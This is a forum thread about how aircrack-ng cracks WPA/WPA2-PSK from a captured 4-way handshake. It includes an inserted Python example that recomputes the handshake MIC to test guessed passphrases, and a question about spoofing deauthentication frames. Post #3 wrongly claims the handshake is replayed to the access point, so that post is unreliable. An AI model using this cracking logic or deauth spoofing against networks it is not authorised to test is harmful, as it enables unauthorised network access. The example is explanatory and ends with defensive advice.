
Thread: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

  1. #1
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    2

    what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    hi guys,
    just for educational purposes, i am wondering what the actual idea behind cracking WPA/WPA2-PSK with aircrack-ng is?
    ok, i know that we need to capture the 4-way authentication handshake first in order to crack the PSK, and i also know the whole process of how to successfully do that to get the key cracked. but my question here is about the actual aircrack-ng technique regarding the key cracking process.
    in the tutorial "how to crack WPA/WPA2" on the aircrack-ng website, it is written that the 4-way handshake packets are captured and used to break the pre-shared key (PSK). but as far as i know, in the 4-way handshake process, the actual PSK is not shared between the client and the access point (AP). the only information shared between the client and the AP is the ANonce, SNonce+MIC, Ack, etc... but not the PSK itself. the PSK is shared between the client and the AP BEFORE the 4-way handshake.
    here is the source of my reference for more details about the 4-way handshake and PSK. http://www.airtightnetworks.com/home...er/80211i.html
    Thus my question is: how does aircrack-ng recover the PSK from the 4-way handshake even though the PSK itself is not included inside the handshake? or maybe i have got the wrong idea altogether... And again, this is only for educational purposes, to know more about the WPA/WPA2 cracking process.
    And my second thought is, although i know how to deauthenticate the victim client to force the authentication process in BT5, how would my wireless station let the victim client know that it is no longer associated with the AP? is that by injecting a spoofed deauthentication packet, as if the deauth packet was sent from the AP, meaning spoofing the sending address in the deauth packet as the AP and the destination address as the victim client?
    thanks a lot ......
    cheers

  2. #2
    Senior Member ShadowMaster
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    the key is used for encrypting along with the essid and.... the point is, with the other variables known, the cracker encrypts with them based off a dictionary, looking for an encrypted handshake match. if it finds one, it has found your key.
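
    The mechanism the two posts above describe, written out as an added example (this is not aircrack-ng's code, nor code from anyone in this thread): the passphrase never crosses the air, but it is stretched with the ESSID as salt into the PMK (PBKDF2-HMAC-SHA1, 4096 iterations), the PMK plus both MAC addresses and both nonces (all visible in the handshake) yield the PTK, and the first 16 bytes of the PTK (the KCK) key the MIC over the EAPOL frame. Anyone holding the capture can therefore derive a MIC from a guessed passphrase and compare it to the captured one; the only secret is the passphrase itself. The handshake below is constructed with a made-up SSID, MAC addresses and nonces, and the `build_sample_handshake` helper standing in for a capture is a hypothetical name, not a real tool.

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC field in an EAPOL-Key frame (802.11i layout):
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The ESSID is the salt, which is why a precomputed table is only good
    for one network name; the 4096 rounds are what make each guess slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four public values seen in the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for an AES-CCMP (key descriptor version 2) frame:
    HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes, eapol_frame: bytes) -> bool:
    """The check a dictionary attack repeats per candidate: derive PMK -> PTK -> KCK,
    recompute the MIC and compare it with the MIC carried in the captured frame."""
    kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic)


def build_sample_handshake(true_passphrase: str) -> dict:
    """Hypothetical helper: constructs a message-2-style EAPOL-Key frame with a
    valid MIC, playing the role of a captured handshake. All values are made up."""
    ssid = "ExampleNet"
    ap_mac = bytes.fromhex("020000000001")      # constructed, locally administered
    sta_mac = bytes.fromhex("020000000002")     # constructed
    anonce = bytes(range(32))                   # constructed
    snonce = bytes(range(32, 64))               # constructed
    frame = bytearray(
        b"\x02\x03\x00\x5f"        # EAPOL version 2, type Key, body length 95
        + b"\x02"                  # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2 (CCMP), pairwise, MIC set
        + b"\x00\x10"              # key length 16
        + b"\x00" * 7 + b"\x01"    # replay counter 1
        + snonce                   # key nonce = SNonce
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # key RSC
        + b"\x00" * 8              # key ID
        + b"\x00" * 16             # key MIC (filled in below)
        + b"\x00\x00"              # key data length 0
    )
    kck = derive_ptk(derive_pmk(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return dict(ssid=ssid, ap_mac=ap_mac, sta_mac=sta_mac,
                anonce=anonce, snonce=snonce, eapol_frame=bytes(frame))


if __name__ == "__main__":
    hs = build_sample_handshake("constructed-passphrase-1")
    for guess in ("password", "constructed-passphrase-1"):
        print(guess, "->", passphrase_matches(guess, **hs))
```

    The defender's takeaway is in `derive_pmk`: every candidate costs 4096 HMAC-SHA1 rounds and the ESSID salts the result, so a long random passphrase and a non-default network name are what make the offline check above impractical, while a short dictionary word falls regardless of how strong the rest of the handshake looks.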

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    27

    Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    You capture the original handshake, then you try to imitate that handshake; once you're done, you go to that AP again and give it that same handshake, and the AP thinks, "Oh... it's you again". Something like that lol.

    I think you don't have to capture it either, just brute-force it in place, but the problem is lack of resources (notebook) and tools. This is why you have to capture it, so you go home where pyrit holds terabytes of hashes and CUDA does it 10 times faster.

  4. #4
    Super Moderator Archangel-Amael
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?

    Reading the documentation on the aircrack-ng website will answer your questions. As this has been widely covered for years, there is no need to redo it here.
    To be successful here, you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.
